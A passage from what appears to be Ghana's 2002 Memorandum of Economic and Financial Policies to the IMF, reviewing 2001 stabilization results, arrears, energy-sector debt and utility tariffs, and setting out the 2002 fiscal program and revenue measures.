loop uses the standard Win32 CreateFile() function with the symbolic device link name "\\\\.\\1394BUS0." For each iteration through the loop, this symbolic link name is incremented to open the next device. For example, the second 1394 bus has the name "\\\\.\\1394BUS1." Once a bus device is open, DiagnoseAllAdapters() calls the Win32 DeviceIoControl() function with IO Control Code IOCTL_1394_TOGGLE_ENUM_TEST_ON, which places the bus into diagnostic mode (see Listing Two). You will notice that DiagnoseAllAdapters() is also used to leave diagnostic mode. The bMode parameter indicates whether to enter or leave diagnostic mode. A value of True means to enter diagnostic mode, and False leaves diagnostic mode. In the case of False, the IO Control Code passed to DeviceIoControl() is IOCTL_1394_TOGGLE_ENUM_TEST_OFF. Once all 1394 buses are in diagnostic mode, any device plugged in at this point will appear as a diagnostic device. Initially, the system will not know about the new device because it has not been registered previously. The system will run the setup process that prompts users for the location of the INF and driver files and loads DumpRomD.SYS. To confirm that there is a device bound to DumpRomD.SYS, Find1394Device() next calls the ConfirmDeviceAttached() routine. ConfirmDeviceAttached() opens device "\\\\.\\DUMPROMD" and issues a GET_NODE_INFO IOCTL, which retrieves a list of devices that are bound to DumpRomD.SYS. The device list is built by a routine called DumpRomDGetDeviceInfo(), which lists all of the devices on every 1394 bus associated with DumpRomD. On return from DumpRomD, ConfirmDeviceAttached() selects one device from the list and returns to Find1394Device() (see Listing Three). Once a device is found and selected, DumpRom calls DecodeConfigRom(), which reads the entire configuration ROM on the device one QUADLET at a time and places the image into a buffer. The old DumpRom program used a routine called ReadQuadlet() to read the configuration ROM image. This version of DumpRom employs the Win32 ReadFile() function with a buffer of four bytes to accomplish the same task.
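In user mode that read is just a couple of Win32 calls; a sketch (the device name comes from Listing One's output, error handling is omitted, and how the utility advances the ROM offset between reads is not shown):
#include <windows.h>

ULONG ReadOneQuadlet(void)
{
    HANDLE h = CreateFile("\\\\.\\DumpRomD000", GENERIC_READ, 0, NULL,
                          OPEN_EXISTING, 0, NULL);
    ULONG quadlet = 0;
    DWORD got;
    /* The 4-byte ReadFile() becomes an IRP_MJ_READ, which DumpRomD.SYS
       turns into a 1394 quadlet Read Request on the bus. */
    ReadFile(h, &quadlet, sizeof(quadlet), &got, NULL);
    CloseHandle(h);
    return quadlet;
}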
The ReadFile() call is translated to an IRP_MJ_READ request by the system, which then calls DumpRomDRead() inside of DumpRomD.SYS. In a nutshell (that is, excluding all of the IRP details), DumpRomDRead() builds an IRB (IO Request Block) structure with a function code of REQUEST_ASYNC_READ and calls 1394BUS.SYS. 1394BUS transmits the 1394 QUADLET Read Request packet on the bus and receives a Read Response packet back from the device. The quadlet value is conveyed to DumpRomDRead(), which returns the value back to ReadConfigRom(); see Figure 2.

The last thing that DumpRom does is decode the configuration ROM, which is achieved via the DecodeConfigRom() function. The source to DecodeConfigRom() did not change significantly from the old version of DumpRom. You can find a detailed description of DecodeConfigRom() in my August 1999 article.

Conclusion

The WDM version of DumpRom is much more complicated than its Windows 95 predecessor. The overall functionality is the same, but the additional driver module, DumpRomD.SYS, greatly increased the development time of the code. Also, hooking the device driver into the system by placing the bus class driver into diagnostic mode added to this level of complexity. Complexity aside, once the driver is installed properly, DumpRom works quite well. It also serves as a convenient tool to debug your configuration ROM under Windows 98 and Windows 2000. Because DumpRom can be dynamically hooked and unhooked from the system, you can decode the configuration ROM of your device and then reconnect the device to continue normal operation without rebooting the system.

References

Alexander, William F. "IEEE 1394 Configuration ROM Decoder," DDJ, August 1999.
ISO/IEC 13212:1994(E) / ANSI/IEEE Std 1212, 1994 Edition, pp. 79-100.
IEEE Standard for a High Performance Serial Bus, IEEE Std 1394-1995, August 30, 1996.
Microsoft Windows 2000 DDK, Beta 2, 1998.
Microsoft Windows 98 DDK, 1998.
Microsoft Developer Network Library, April 1999.
DDJ

Listing One

Device \\.\1394BUS0 in diagnostic mode
Found 1 devices on \\.\DUMPROMD
Device List:
Name = DumpRomD000, Port = 0000, Bus = 03FF, Node = 0000
Selected device: index=0,Name=\\.\DumpRomD000,Port=0000,Bus=03FF,Node=0000

Raw Data Dump of the Configuration ROM
1394 Addr Off   Data
-------------   --------  --------  --------  --------
FFFF:F0000400   04302F55  31333934  00FF5002  00A0B800
FFFF:F0000410   00005009  0006E8D7  0C0083C0  0300A0B8
FFFF:F0000420   81000011  0400500A  81000015  D1000001
FFFF:F0000430   000C6208  1200609E  13010483  3C002600
FFFF:F0000440   5400C000  3A401E08  3800609E  390104D8
FFFF:F0000450   3B000000  3D000000  14000000  17000000
FFFF:F0000460   8100000E  000568A5  00000000  00000000
FFFF:F0000470   4C534920  4C6F6769  63000000  0006EBEF
FFFF:F0000480   00000000  00000000  4C534920  35303120
FFFF:F0000490   72657620  42330000  000AE09E  00000000
FFFF:F00004A0   00000000  53594D31  33465735  30302D44
FFFF:F00004B0   49534B20  44524956  45000000  00000000
FFFF:F00004C0   00000000

Decode of the Configuration ROM
1394 Addr Off   Quadlet   Meaning
-------------   --------  --------------------------------------------------
Configuration ROM Header
FFFF:F0000400   04302F55  info_length=04, crc_length=30, rom_crc_value=2F55
Bus_Info_Block
FFFF:F0000404   31333934  bus_name=31333934 ("1394")
FFFF:F0000408   00FF5002  irmc=0, cmc=0, isc=0, bmc=0, cyc_clk_acc=FF, max_rec=5
FFFF:F000040C   00A0B800  node_vendor_id=00A0B8, chip_id_hi=00
FFFF:F0000410   00005009  chip_id_lo=00005009
Root_Directory
FFFF:F0000414   0006E8D7  length=0006, crc=E8D7
FFFF:F0000418   0C0083C0  Node_Capabilities spt 64 fix lst drg
FFFF:F000041C   0300A0B8  Module_Vendor_Id 00A0B8
FFFF:F0000420   81000011  Textual_Descriptor leaf ind_off=000011 (FFFF:F0000464)
FFFF:F0000424   0400500A  Module_Hw_Version 00500A
FFFF:F0000428   81000015  Textual_Descriptor leaf ind_off=000015 (FFFF:F000047C)
FFFF:F000042C   D1000001  Unit_Directory directory ind_off=000001 (FFFF:F0000430)
Unit_Directory directory referenced from FFFF:F000042C
FFFF:F0000430   000C6208  length=000C, crc=6208
FFFF:F0000434   1200609E  Unit_Spec_Id 00609E
FFFF:F0000438   13010483  Unit_Sw_Version 010483
FFFF:F000043C   3C002600  Firmware_Revision 002600
FFFF:F0000440   5400C000  Management_Agent crc_offset=00C000 (FFFF:F0030000)
FFFF:F0000444   3A401E08  Unit_Characteristics 401E08
FFFF:F0000448   3800609E  Command_Set_Spec_Id 00609E
FFFF:F000044C   390104D8  Command_Set 0104D8
FFFF:F0000450   3B000000  Command_Set_Revision 000000
FFFF:F0000454   3D000000  key=3D (UNKNOWN) value = 000000
FFFF:F0000458   14000000  Logical_Unit_Number o=0, device_type=00, lun=0000
FFFF:F000045C   17000000  Model_Id value = 000000
FFFF:F0000460   8100000E  Textual_Descriptor leaf ind_off=00000E (FFFF:F0000498)
Textual_Descriptor leaf referenced from FFFF:F0000420
FFFF:F0000464   000568A5  length=0005, crc=68A5
FFFF:F0000468   00000000  ....
FFFF:F000046C   00000000  ....
FFFF:F0000470   4C534920  LSI
FFFF:F0000474   4C6F6769  Logi
FFFF:F0000478   63000000  c...
Textual_Descriptor leaf referenced from FFFF:F0000428
FFFF:F000047C   0006EBEF  length=0006, crc=EBEF
FFFF:F0000480   00000000  ....
FFFF:F0000484   00000000  ....
FFFF:F0000488   4C534920  LSI
FFFF:F000048C   35303120  501
FFFF:F0000490   72657620  rev
FFFF:F0000494   42330000  B3..
Textual_Descriptor leaf referenced from FFFF:F0000460
FFFF:F0000498   000AE09E  length=000A, crc=E09E
FFFF:F000049C   00000000  ....
FFFF:F00004A0   00000000  ....
FFFF:F00004A4   53594D31  SYM1
FFFF:F00004A8   33465735  3FW5
FFFF:F00004AC   30302D44  00-D
FFFF:F00004B0   49534B20  ISK
FFFF:F00004B4   44524956  DRIV
FFFF:F00004B8   45000000  E...
FFFF:F00004BC   00000000  ....
FFFF:F00004C0   00000000  ....
Listing Two
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// DiagnoseAllAdapters
//    Puts/Takes all 1394 controllers into/out of diagnostic mode
// Entry:
//    hWnd     Window handle
//    bMode    Mode flag
//             TRUE  = turn on diagnostic mode
//             FALSE = turn off diagnostic mode
// Exit:
//    TRUE     All 1394 adapters are in/out of diagnostic mode
//    FALSE    operation failed
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BOOL DiagnoseAllAdapters ( HWND hWnd, BOOL bMode)
{
    //#define DEBUGFLAGS DebugThisRoutine
    BOOL    retcode;
    HANDLE  hDev;
    DWORD   dwRet;
    DWORD   dwBytesRet;
    CHAR    DeviceName[STRING_SIZE];
    DWORD   index;
    DWORD   numAdaptersToggled;

    DBOUT (DBG_LF_ENTRY, "DiagnoseAllAdapters\r\n");
    // Assume failure
    retcode = FALSE;
    // Get 1394 bus class driver's symbolic name
    strcpy (DeviceName, BUS_SYMBOLIC_LINK);
    pDiagnosticDeviceName = DeviceName;
    // Find all of the host controllers
    for(index = 0, numAdaptersToggled = 0; index < 10; index++)
    {
        // Create next host controller name
        pDiagnosticDeviceName[11] = (char)('0' + index);
        // try to open it
        //MyPrintf ("Attempting to open 1394 adapter %s ...", pDiagnosticDeviceName);
        hDev = CreateFile( pDiagnosticDeviceName,
                           GENERIC_WRITE | GENERIC_READ,
                           FILE_SHARE_WRITE | FILE_SHARE_READ,
                           NULL, OPEN_EXISTING, 0, NULL);
        if(hDev == INVALID_HANDLE_VALUE)
        {
            continue;
        }
        // Put into or take out of diagnostic mode
        dwRet = DeviceIoctl( hWnd, hDev, DeviceName,
                             (bMode) ? IOCTL_1394_TOGGLE_ENUM_TEST_ON
                                     : IOCTL_1394_TOGGLE_ENUM_TEST_OFF,
                             NULL, 0, NULL, 0, &dwBytesRet);
        if (!dwRet)
        {
            dwRet = GetLastError();
            MyPrintf ("\r\nError = 0x%08X\r\n", dwRet);  // report the Win32 error code
        }
        else
        {
            numAdaptersToggled++;
            if (bMode == TRUE)
                MyPrintf ("Device %s in diagnostic mode\r\n", DeviceName);
            else
                MyPrintf ("Device %s out of diagnostic mode\r\n", DeviceName);
        }
        // Close the current host controller
        CloseHandle(hDev);
    }
    // Did we toggle any adapters?
    if (numAdaptersToggled != 0)
        retcode = TRUE;
    DBOUT1 (DBG_LF_EXIT, "DiagnoseAllAdapters exit, retcode = %s\r\n",
            retcode==TRUE?"TRUE":"FALSE");
    return (retcode);
    #define DEBUGFLAGS DebugFlags
}

Listing Three
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// ConfirmDeviceAttached
//    Confirms that a diagnostic 1394 device is attached and ready to go.
// Entry:
//    hWnd          Window handle
//    szDeviceName  Name of driver device to which a
//                  diagnostic device should be attached.
// Exit:
//    TRUE     Device is attached and ready
//    FALSE    No devices present
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BOOL ConfirmDeviceAttached ( HWND hWnd, PSTR szDeviceName)
{
    //#define DEBUGFLAGS DebugThisRoutine
    BOOL        retcode;
    HANDLE      hDev;
    DWORD       dwRet, dwBytesRet;
    PNODE_INFO  pNodeInfo;
    CHAR        tmpBuff[STRING_SIZE];
    ULONG       Node = 0L;
    ULONG       i;
    int         ccode;

    DBOUT (DBG_LF_ENTRY, "ConfirmDeviceAttached\r\n");
    // Assume failure
    retcode = FALSE;
    // set this to no device under test
    numDevices = 0;
    hDev = INVALID_HANDLE_VALUE;
    // Open the adapter
    hDev = OpenDevice(hWnd, szDeviceName, TRUE);
    if(hDev == INVALID_HANDLE_VALUE)
        goto OpenError;
    // Allocate a buffer
    pNodeInfo = (PNODE_INFO) GlobalAlloc(GPTR, MAX_INFO_BUFF_SIZE);
    if(pNodeInfo == NULL)
        goto AllocError;
    // Extract node info
    dwRet = DeviceIoctl(hWnd, hDev, szDeviceName, GET_NODE_INFO,
                        NULL, 0, pNodeInfo, MAX_INFO_BUFF_SIZE, &dwBytesRet);
    if(dwRet == 0)
        goto NodeInfoError;
    // let's go ahead and throw this in the edit control
    // get the number of current devices
    numDevices = pNodeInfo->numEntries;
    MyPrintf ("Found %d devices on %s\r\n", numDevices, szDeviceName);
    // allocate memory for keeping info about devices around
    // if we have device info get rid of it for new
    if(pDeviceInfo != NULL)
        GlobalFree(pDeviceInfo);
    // now allocate memory for device info on all devices
    pDeviceInfo = (PDEVICE_INFO) GlobalAlloc(GPTR, sizeof(DEVICE_INFO) * numDevices);
    i = pNodeInfo->numEntries-1;
    // print out node info
    if (pNodeInfo->numEntries)
        MyPrintf ("Device List:\r\n");
    while(Node < pNodeInfo->numEntries)
    {
        // save device info in our freshly allocated buffer
        pDeviceInfo[i].nodeInfo = pNodeInfo->entry[Node];
        MyPrintf ( "Name = %s, Port = %04X, Bus = %04X, Node = %04X\r\n",
                   pDeviceInfo[i].nodeInfo.LinkName,
                   pDeviceInfo[i].nodeInfo.RawAddress.Port,
                   pDeviceInfo[i].nodeInfo.RawAddress.NA_Bus_Number,
                   pDeviceInfo[i].nodeInfo.RawAddress.NA_Node_Number);
        // if it's a raw device then save that in link name
        // otherwise, fill in with real name
        if(strcmp(pDeviceInfo[i].nodeInfo.LinkName, RAW_DEVICE) != 0)
        {
            // it's not a raw device so let's stick stuff on front
            strcpy(tmpBuff, DEFAULT_DEVICE_LINK);
            strcpy(&tmpBuff[4], pDeviceInfo[i].nodeInfo.LinkName);
            strcpy(pDeviceInfo[i].nodeInfo.LinkName, tmpBuff);
            pDeviceInfo[i].bRawDevice = FALSE;
        }
        else
        {
            // just copy in global symbolic link
            strcpy(pDeviceInfo[i].nodeInfo.LinkName, GLOBAL_SYMBOLIC_LINK);
            pDeviceInfo[i].bRawDevice = TRUE;
        }
        // next node
        Node++;
        i--;
    }
    // Select a device and default to the first one
    deviceUnderTest = 0;
    if (pNodeInfo->numEntries > 1)
    {
        // Display device dialog box and let the user choose one
        ccode = DialogBox((HINSTANCE) GetWindowLong(hWnd, GWL_HINSTANCE),
                          "SelectDevice", hWnd, (DLGPROC) SelectDeviceDlgProc);
        if (ccode != TRUE)
            goto Exit;
    }
    // Do we have any entries?
    if (pNodeInfo->numEntries)
        retcode = TRUE;
    // Display selected device
    i = deviceUnderTest;
    MyPrintf ("\r\n\r\nSelected device: index = %d, Name = %s, Port = %04X, Bus = %04X, Node = %04X\r\n",
              i,
              pDeviceInfo[i].nodeInfo.LinkName,
              pDeviceInfo[i].nodeInfo.RawAddress.Port,
              pDeviceInfo[i].nodeInfo.RawAddress.NA_Bus_Number,
              pDeviceInfo[i].nodeInfo.RawAddress.NA_Node_Number);
Exit:
    // free up resources
    if (hDev != INVALID_HANDLE_VALUE)
        CloseHandle(hDev);
    if(pNodeInfo)
        GlobalFree(pNodeInfo);
    DBOUT1 (DBG_LF_EXIT, "ConfirmDeviceAttached exit, retcode = %s\r\n",
            retcode==TRUE?"TRUE":"FALSE");
    return (retcode);
OpenError:
    MyPrintf ("\r\nConfirmDeviceAttached: Unable to open %s\r\n", szDeviceName);
    goto Exit;
AllocError:
    MyPrintf ("\r\nConfirmDeviceAttached: Unable to allocate memory\r\n");
    goto Exit;
NodeInfoError:
    // pass szDeviceName so the %s in the format string has an argument
    MyPrintf ("\r\nConfirmDeviceAttached: Unable to read node information from %s\r\n", szDeviceName);
    goto Exit;
    #define DEBUGFLAGS DebugFlags
}
http://www.drdobbs.com/windows/a-wdm-ieee-1394-configuration-rom-decode/184411134
CC-MAIN-2016-30
en
refinedweb
iPcCollisionDetection Struct Reference

This property class controls collision detection of an entity with the world map and other meshes.

#include <propclass/colldet.h>

Inheritance diagram for iPcCollisionDetection.

Detailed Description

This property class controls collision detection of an entity with the world map and other meshes. It should be used in combination with iPcLinearMovement but otherwise doesn't depend on any other property classes, so in that sense it is unrelated to the other movement property classes.

Definition at line 41 of file colldet.h.

Member Function Documentation

This function takes a position vector, checks against all known colliders, and returns the adjusted position in the same variable.

Initialize the CD box for the object. The two parameters are the dimensions of the body and the legs collider boxes. The 'shift' vector is used to shift the box. By default (with shift equal to the 0 vector) the colliders are created assuming the 0,0,0 origin is at the bottom center of the actor.

Check if the mesh is on the ground.

Set the on-ground flag.

The documentation for this struct was generated from the following file: propclass/colldet.h

Generated for CEL: Crystal Entity Layer 1.2 by doxygen 1.4.7
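Example (illustrative only): the factory name passed to CreatePropertyClass() and the exact Init() prototype below are assumptions based on the description above, not verified declarations; consult propclass/colldet.h for the real API.

#include <cssysdef.h>
#include <csgeom/vector3.h>
#include <physicallayer/pl.h>
#include <physicallayer/entity.h>
#include <physicallayer/propclas.h>
#include <propclass/colldet.h>

bool SetupActorCollisions (iCelPlLayer* pl, iCelEntity* entity)
{
  // Create the property class on the entity (factory name assumed).
  iCelPropertyClass* pc = pl->CreatePropertyClass (entity, "pccollisiondetection");
  if (!pc) return false;

  csRef<iPcCollisionDetection> colldet =
    scfQueryInterface<iPcCollisionDetection> (pc);
  if (!colldet) return false;

  // Body and legs collider boxes with no shift: the 0,0,0 origin is then
  // at the bottom center of the actor, as described above.
  csVector3 body (0.5f, 1.4f, 0.5f);
  csVector3 legs (0.3f, 0.4f, 0.3f);
  csVector3 shift (0.0f);
  return colldet->Init (body, legs, shift);   // assumed prototype
}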
http://crystalspace3d.org/cel/docs/online/api-1.2/structiPcCollisionDetection.html
CC-MAIN-2016-30
en
refinedweb
NAME
close - close a file descriptor

SYNOPSIS
#include <unistd.h>

int close(int fildes);

DESCRIPTION
The close() function will deallocate the file descriptor indicated by fildes, making it available for return by subsequent calls to open(2) or other functions that allocate file descriptors.

If fildes refers to a socket, close() causes the socket to be destroyed. If the socket is connection-mode, and the SO_LINGER option is set for the socket, and the socket has untransmitted data, then close() will block for up to the current linger interval until all data is transmitted.

RETURN VALUES
Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error.

ERRORS
The close() function will fail if:

EBADF
    The fildes argument is not a valid file descriptor.

EINTR
    The close() function was interrupted by a signal.

ENOLINK
    The fildes argument is on a remote machine and the link to that machine is no longer active.

ENOSPC
    There was no free space remaining on the device containing the file.

The close() function may fail if:

EIO
    An I/O error occurred while reading from or writing to the file system.

USAGE
An application that used the stdio function fopen(3C) to open a file should use the corresponding fclose(3C) function rather than close().

ATTRIBUTES
See attributes(5) for descriptions of the following attributes:

SEE ALSO
intro(3), creat(2), dup(2), exec(2), fcntl(2), ioctl(2), open(2), pipe(2), fattach(3C), fclose(3C), fdetach(3C), fopen(3C), signal(3C), attributes(5), signal(3HEAD), streamio(7I)
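For example, a conservative caller checks the return value of close() and reports the errno value on failure. The sketch below is illustrative only; the file name is arbitrary.

#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    int fildes = open("/tmp/example", O_RDONLY);   /* arbitrary example file */
    if (fildes == -1) {
        perror("open");
        return 1;
    }

    /* ... use the descriptor ... */

    if (close(fildes) == -1) {
        /* EBADF, EINTR, ENOLINK, ENOSPC (or EIO) may be reported here. */
        fprintf(stderr, "close: %s\n", strerror(errno));
        return 1;
    }
    return 0;
}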
http://docs.oracle.com/cd/E19455-01/806-0626/6j9vgh64n/index.html
CC-MAIN-2016-30
en
refinedweb
Whenever the compiler does not recognize an identifier (such as a class or variable name), Java reports the error "cannot find symbol". The usual reason behind the "cannot find symbol" error is a reference to an identifier that has not been declared in the current scope.

The following example will help you understand the Java error "cannot find symbol". In this example, a class named Cannotfindsymbol is used. Two int variables, w and x, are initialized with values, and int y stores the sum of those values. System.out.println is used to print the output, but the programmer, instead of writing y, wrote the variable z. The compiler does not recognize the variable z and therefore reports the error "cannot find symbol".

Cannotfindsymbol.java

import java.lang.*;
public class Cannotfindsymbol {
    public static void main(String[] args) {
        try {
            int w = 10;
            int x = 3;
            int y = w + x;
            System.out.println(z);
        }
        catch (Exception ex) {
            System.out.println(ex);
        }
    }
}

Output:

/home/girish/NetBeansProjects/errors/src/Cannotfindsymbol.java:11: cannot find symbol
symbol  : variable z
location: class Cannotfindsymbol
            System.out.println(z);
1 error

To remove this error, declare the variable z before using it, or print the already declared variable y instead.
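For comparison, here is a corrected version of the program that prints the declared variable y instead of the undefined z. The try/catch block is dropped as well, since "cannot find symbol" is a compile-time error and can never be caught at run time:

public class Cannotfindsymbol {
    public static void main(String[] args) {
        int w = 10;
        int x = 3;
        int y = w + x;           // y is declared, so the compiler knows this symbol
        System.out.println(y);   // prints 13
    }
}

This version compiles cleanly and prints 13.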
http://roseindia.net/java/java-get-example/java-error-cannot-find-symbol.shtml
CC-MAIN-2016-30
en
refinedweb
The Government of Ghana intends to make these understandings public and authorizes the Fund to provide this letter and the attached memorandum to all interested parties that so request, including through the Fund's external website. 9. We can assure you Mr. Managing Director, that the Government of Ghana is determined to fully implement the program and we hope we can count on the continued support of the Fund in our endeavors. Hon. Yaw Osafo-Maafo, MP Minister of Finance Hon. Paul A. Acquah Governor of the Bank of Ghana Memorandum of Economic and Financial Policies of the Government of Ghana for 2002 January 31, 2002 I. Introduction 1. Following the severe terms of trade shock and financial crisis in 2000, the newly-elected government of Ghana adopted an economic program for its first year in office with the paramount objectives of curtailing inflation and putting the public finances back on a sustainable path. This program, which was set out in our Memorandum of Economic and Financial Policies dated June 11, 2001, was the initial phase of a medium-term strategy aimed at reducing domestic indebtedness and freeing up scarce resources for investment and growth in the Ghanaian economy. At the same time, the government worked to elaborate and expand that strategy, with the broad-based participation of civil society and the international community, into a comprehensive plan for accelerated development and sustained poverty reduction. These efforts are expected to culminate with the completion of the Ghana Poverty Reduction Strategy (GPRS) in early 2002, which will lay out the broad policy agenda for 2002-2004. 2. In support of its poverty reduction strategy, and its own efforts to reduce the burden of domestic public debt, the government decided to seek relief on its external debt obligations, including under the enhanced HIPC Initiative. Current estimates suggest that Ghana could in due course receive debt relief equivalent to 56 percent of the value of its external debt at end-2000 under the enhanced HIPC Initiative, and that external debt payments would be reduced in 2002 by US$249 million. 3. This memorandum reports on implementation of the government's economic program in 2001, and sets out key elements of the 2002 program, in line with the draft GPRS. The program for the coming year will seek to build on progress achieved thus far in achieving financial stability, while intensifying efforts to strengthen public sector management and lay the foundations for sustained economic growth. II. Program Performance During 2001 4. During 2001, considerable progress was made in achieving stabilization of the Ghanaian economy. From a peak of 42 percent in March 2001, consumer price inflation declined to 21 percent by December, compared to the program target of 25 percent. Following a sharp depreciation in 2000, the cedi stabilized at around 7,200 per U.S. dollar during 2001. Gross international reserves continued to recover, from US$264 million at end-2000 to a projected US$352 million (1.2 months of imports) by December 2001. The objective of 4 percent real growth in the economy is expected to be realized, aided in part by stability in the terms of trade, following sharp losses in the previous two years. 5. These positive results were achieved by firm financial discipline. 
Aided by government's strict control of cash expenditures, the Bank of Ghana succeeded in reducing the stock of reserve money by 5 percent during the first eight months of 2001, reversing a good part of the excessive monetary expansion that occurred in 2000. The end-August 2001 targets for the government's domestic primary surplus and net domestic financing, and for increases in the net domestic assets and net international reserves of the Bank of Ghana, were all met. The program limit on nonconcessional external borrowing was also observed, but the ceiling on short-term external debt was exceeded, due to the inclusion in the data of the Bank of Ghana's overdraft positions with foreign banks. These overdraft positions had previously been netted from gross reserves rather than recorded as short-term debt. 6. While cash expenditures of the government were kept within budget, control of spending commitments remained weak. The new system for cash flow forecasting and ceilings on expenditure commitments was not fully implemented during the third quarter of 2001, as had been hoped. As a result, new non-road arrears of some 176 billion are estimated to have accumulated during the first eight months of the year. The stock of road arrears, which was targeted to decline to 190 billion by end-August 2001, instead continued to rise to 278 billion by that date. In addition, a total of 393 billion in outstanding payments due to the District Assemblies Common Fund (DACF), Ghana Education Trust Fund (GETF), and Social Security and National Insurance Trust (SSNIT) were accumulated in the year to end-August 2001. At the same time, however, the government cleared 442 billion in pre-2001 non-road arrears, more than double the amount originally budgeted for arrears clearance in 2001. 7. The government attaches great importance to its objective of reducing the domestic debt burden, and hence was determined to achieve its original program target for the domestic primary balance of 1,515 billion for 2001 as a whole. Tax revenues are expected to fall some 3½ percent below target in 2001, due in part to delays in implementing some of the 2001 Budget measures, while the wage settlement finally negotiated with public service workers was higher than planned. To offset these losses to the budget, the government set reduced ceilings on expenditures for goods and services and capital projects for the last quarter of 2001, which were rigorously enforced by the CAGD and Ministry of Finance. At the same time, the government decided that it was unwise to transfer during the remainder of 2001 the full amount of statutory payments accruing to the DACF and GETF, given the funds' limited capacity to spend these resources in 2001. Instead, the government transferred approximately 35 percent of its 2001 obligations to these funds before the end of 2001, and the balance will be transferred in tranches during 2002-2004. 8. The program envisaged that a full audit of the stock of expenditure arrears accumulated in 2000 would be completed by end-August 2001, and a plan adopted for their liquidation. In the event, the work needed to carry out this audit, which was conducted by donor-funded consultants, was considerably more extensive than expected, and the full audit will now be completed by end-March 2002. However, the auditors have provided an interim report with a preliminary estimate for pre-2001 non-road, non-statutory arrears of 420 billion. 
In addition, the government has supplemented this work with its own audit of non-road government expenditure arrears accumulated during January-August 2001 and of the stock of outstanding road arrears, to provide a more complete assessment of the scale of arrears that would need to be addressed in the 2002 Budget. Meanwhile, for the remainder of 2001, sufficient funds were allocated to clear all but 35 billion of the new non-road arrears accumulated in 2001, and to limit the increase in the stock of road arrears during the year to 81 billion. 9. Progress was made on the implementation of structural measures affecting public enterprises in the energy sector, although with some delays. Agreements were reached in August and September with creditor banks to restructure a portion of the domestic debt of Tema Oil Refinery (TOR) that had resulted from a failure to adjust petroleum prices in line with world prices in 1999 and 2000. The agreements reached with the commercial bank creditors on TOR debt were effective in July and August and the government effected the first semi-annual interest payments due to the banks on the bonds in December 2001 and January 2002 respectively. In exchange for short-term claims on TOR, banks received longer-maturity government bonds. On August 17, 2001, a 15 percent excise tax was imposed on petroleum products, followed on October 31 by specific duties averaging 200 per liter. In addition, in order to defray further TOR's accumulated debts resulting from previous petroleum price controls, Parliament has approved the principle that part of any potential savings which may accrue from future reductions in world oil prices would be used to service the TOR debt. Accordingly, the petroleum price adjustment formula will be modified from end-March 2002 to incorporate a petroleum debt service surcharge (PDSS), where the PDSS will be set at 95 percent of any decline in oil import costs from the average level prevailing during November 27-December 26, 2001. The petroleum price adjustment formula, as modified, will be applied throughout 2002. 10. The Public Utilities Regulatory Commission held extensive public hearings during the summer of 2001 on plans for a phased transition to full cost recovery in the electricity sector and implementation of an automatic tariff adjustment formula for electricity tariffs. The plan was finalized in November 2001, and implementation will begin by end-April 2002. A similar consultative process is underway on a transitional plan for cost recovery in water tariffs. In this case, however, complications related to the authorities' intention to seek a private capital injection for the upgrading and expansion of the water infrastructure will delay conclusion and implementation of the water tariff adjustment plan to June 2002. 11. The government had intended to raise not less than US$50 million from divestiture proceeds in 2001. However, a new Board for the Divestiture Implementation Committee (DIC), which would oversee and ensure the transparency of these asset sales, was not approved by the Council of State until late August 2001. Work then began in earnest on the necessary asset valuations, but the delays mean that the proceeds from divestiture in 2001 will be no more than US$14 million. Financial and management audits of 11 major public enterprises, including ECG, GWCL, and TOR, were initiated in August 2001 and final reports were submitted on December 15, 2001. 
Consideration is being given to launching similar audits for Cocobod, VRA, and GPHA, which would be completed by mid-2002. 12. As part of its strategy to ease the burden of domestic debt on Ghana's economy, the government began in September 2001 to extend the maturity of its domestic debt by issuing three-year inflation-indexed bonds. By end-2001, it was expected that approximately one fifth of the stock of 90-day treasury bills would have been replaced with the new indexed instruments. 13. As planned, a revised Bank of Ghana Law was submitted to Parliament in August 2001, and passed into law in December. The new law clarifies the objectives and strengthens the independence of the central bank. Progress in this respect was reinforced by the Bank of Ghana's divestiture in December 2001 of all remaining shareholdings in financial institutions that it supervises. III. The Program for 2002 A. Macroeconomic Objectives 14. In line with the medium-term objectives laid out in the GPRS, the government's economic program for 2002 is designed to: Key policies needed to deliver these outcomes and lay the foundations for further gains in subsequent years include: B. Financial Policies for 2002 Fiscal Policy 15. The government's detailed expenditure plans for 2002 have been drawn up in line with the programs and priorities identified in the draft GPRS. In formulating these plans, the government has made provision for a 20 percent full-year increase in civil service wages, which together with the 2001 pay increase will more than fully correct the erosion in real wages of government workers that occurred during 1999 and 2000. The budget will also incorporate real increases in allocations for domestic capital expenditure, by comparison with the necessarily tight limits imposed in 2001, to give effect to the development goals outlined in the GPRS. Overall capital expenditures could be increased further if additional foreign assistance were to become available. The statutory transfers due to the DACF, GETF, and SSNIT in 2002 will be budgeted and paid in full, in addition to 337 billion of unpaid obligations from 2001. For the first time, the 2002 Budget will also contain an explicit allocation to cover the cost of price subsidies in the electricity and water sectors (see below). 16. To fund these spending needs while maintaining a firm downward trend in the ratio of domestic debt to GDP, the government will introduce revenue measures with a total yield of 1 percent of GDP in 2002. These measures will be designed to place government finances on a sounder long-term footing by emphasizing efficient, broad-based taxation. The total package will include some initial measures to be introduced with the 2002 Budget, with a combined yield of 0.3 percent of GDP. These will include the elimination of a range of tax and tariff exemptions, the application of a 5 percent import duty rate to a set of major product lines that are currently zero-rated, the application of a 1 percent processing fee on all remaining zero-rated items and on items attracting a 10 percent concessionary rate, the introduction of a 10 percent withholding tax on rental income, and a restructuring of the lottery sector to increase the proceeds flowing to the budget. Further broad-based measures with a 2002 yield of not less than 330 billion (equivalent to 0.7 percent of GDP) will be formulated and submitted to Parliament, for intended passage before the summer parliamentary recess in August 2002. 17. 
